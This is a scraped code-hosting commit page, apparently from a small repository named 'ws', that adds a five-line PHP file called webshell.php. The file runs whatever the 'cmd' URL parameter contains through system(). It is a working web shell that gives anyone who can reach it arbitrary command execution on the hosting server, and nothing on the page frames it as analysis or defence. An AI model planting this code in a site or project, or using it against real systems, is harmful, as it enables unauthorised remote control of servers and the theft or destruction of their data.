This website works better with JavaScript.
Explore
Help
Register
Sign In
admin123
/
ws
Watch
1
Star
0
Fork
You've already forked ws
0
Code
Issues
Pull Requests
Projects
Releases
Wiki
Activity
Browse Source
Create webshell.php
php webshell
main
Roronoawjd
2 years ago
committed by
GitHub
parent
4b3698ef96
commit
4b1d1c879b
No known key found for this signature in database
GPG Key ID:
4AEE18F83AFDEB23
1 changed files
with
5 additions
and
0 deletions
Whitespace
Show all changes
Ignore whitespace when comparing lines
Ignore changes in amount of whitespace
Ignore changes in whitespace at EOL
Unified View
Diff Options
Show Stats
Download Patch File
Download Diff File
5
webshell.php
5
webshell.php
Unescape
Escape
View File
@ -0,0 +1,5 @@
<?php
if(isset($_GET["cmd"])){
system($_GET["cmd"]);
}
?>
Write
Preview
Loading…
Cancel
Save
Reference in new issue
Repository
admin123/ws
Title
Body
Create Issue